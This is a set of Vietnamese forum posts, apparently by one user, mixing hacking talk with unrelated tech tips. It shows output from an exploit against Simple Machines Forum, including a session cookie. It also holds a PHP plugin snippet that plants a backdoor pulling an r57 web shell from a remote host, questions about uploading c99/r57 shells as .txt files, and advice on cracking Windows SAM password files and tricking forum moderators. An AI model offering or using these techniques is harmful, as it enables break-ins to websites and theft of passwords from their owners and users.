|
|
Code:
X-Powered-By: PHP/4.4.7
Content-type: text/html
--------------------------------------------------------------------------------
Simple Machines Forum <= 1.1.RC2 "lock"/Zend_Hash_Del_Key_Or_Index Vulnerability
by rgod <a href="mailto:rgod@autistici.org">rgod@autistici.org</a>
site: http://retrogod.altervista.org
dork, version specific: "Powered by SMF"
--------------------------------------------------------------------------------
cookie -> PHPSESSID=e2a6636da00607172259aace4d4c176c; SMFCookie10=a%3A4%3A%7Bi%3A0%3Bs%3A3%3A%22274%22%3Bi%3A1%3Bs%3A40%3A%22819cbe529e994c6e82f8f565c1f744e3bf9490c8%22%3Bi%3A2%3Bi%3A1368598931%3Bi%3A3%3Bi%3A0%3B%7D;
sessid -> e2a6636da00607172259aace4d4c176c
user id -> 0
sc code ->
num replies ->
Exploit succeeded...
thấy nó báo succes mà trả bít là lock topic nào ,thử mãi thấy mỗi topic giá trị 1 là succes còn trả được thằng nào ,ghét thật.
|
|
|
Lấy pass hash rồi làm gì đây bác?
|
|
|
Đã test thử host xịn cũng dính ,hic hic
|
|
|
yankee wrote:
anh có thể nói rõ hơn một tí nữa hay ko.Em khong hiểu.vao /etc/hots là ở đâu.
*.nix đó bạn
|
|
|
chủ đề này có nhiều rồi mà ,có thể vào dos rồi copy /system32/config/sam rồi crack bằng L0phtcrack
|
|
|
Mình thấy một số forum cho phép upload file *.txt và ko giới hạn kích thước của tệp,ko biết liệu mình có thể lợi dụng để up một con shell như c99 hay r57 được ko ,vì mình thấy có một số bài viết nói đến việc save các shell này với định dạng *.txt rồi up lên để thực thi.
mong các pác chỉ giáo giúp.
thanks.
|
|
|
pác MicrosoftX chán làm admin bên vờ nis rồi hay sao ,sang đây mần chi??
|
|
|
Khi mình cài đặt thì nó tự động chia các phân vùng cho mình ,trước khi cài đặt bạn chỉ cần format nó với định dạng Fat32 khi cài đặt nó tự định dạng lại cho mình ,còn nếu muốn chia bằng tay bạn có thể dùng partionmagic8.0 để format và định dạng cho từng phân vùng.
|
|
|
Vậy thì lừa thằng Smod ,thằng này chắc dễ lừa hơn thằng admin,tỉ lệ thành công lại cao hơn
|
|
|
Vào Dos gõ
format c:
cài lại là nhanh nhất ko phải lo nghĩ gì cả.
|
|
|
ta có thể xài netcat hay VNC Cũng được
|
|
|
Mình vào quyềnadmin rồi add thêm plugin gọi shell từ host của mình
ví dụ như cái này
forumhome_complete
if ($_REQUEST['abc']=="mechk") {
include
("http://host.com/r57.txt"
ko biết có gì sai ko mong pà con chỉ giáo.
|
|
|
dùng windows movie maker trực tiếp trong win xp cũng ghi âm được chất lượng cũng khá mà thời gian thì no limit.
|
|
|
Mình gõ trong gaim1.5
|
|
|
Bạn cài l0phtcrack để crack file Sam trong \windows\system32\config
nếu cần thì cho mail mình gửi cho
|
|
|
Bà con cho một chàng vỗ tay cho tinh thần luckylukef6_87 nào ,bạn cứ chiến thật lực đi bạn .
|
|
|
Mình đang sử dụng Mandrake9.2 cài đặt xvnkb xong rùi nhưng vẫn ko gõ được tiếng việt ,gõ chữ "ư" thì gõ chữ "U" đến khi gõ "W" thì nó biến mất tiêu trả còn gì ,không hiểu vì sao,mong bà con chỉ giáo.
thanks.
|
|
|
bạn thử dùng revelation xem ,chỉ cần đưa ô tròn của nó qua chỗ pass mã hóa là nó cho kết quả ra dạng text ngay
|
|